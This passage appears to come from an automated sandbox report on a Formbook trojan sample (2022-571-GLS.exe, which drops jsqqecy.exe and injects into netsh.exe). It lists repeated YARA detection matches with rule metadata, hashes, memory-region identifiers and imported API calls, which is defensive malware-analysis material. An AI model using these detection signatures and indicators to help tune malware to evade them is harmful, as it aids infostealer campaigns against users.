          Source: Yara matchFile source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2022-571-GLS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040324F
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_004063330_2_00406333
          Source: C:\Users\user\Desktop\2022-571-GLS.exeCode function: 0_2_004049360_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\jsqqecy.exeCode function: 1_2_00BC18D01_2_00BC18D0
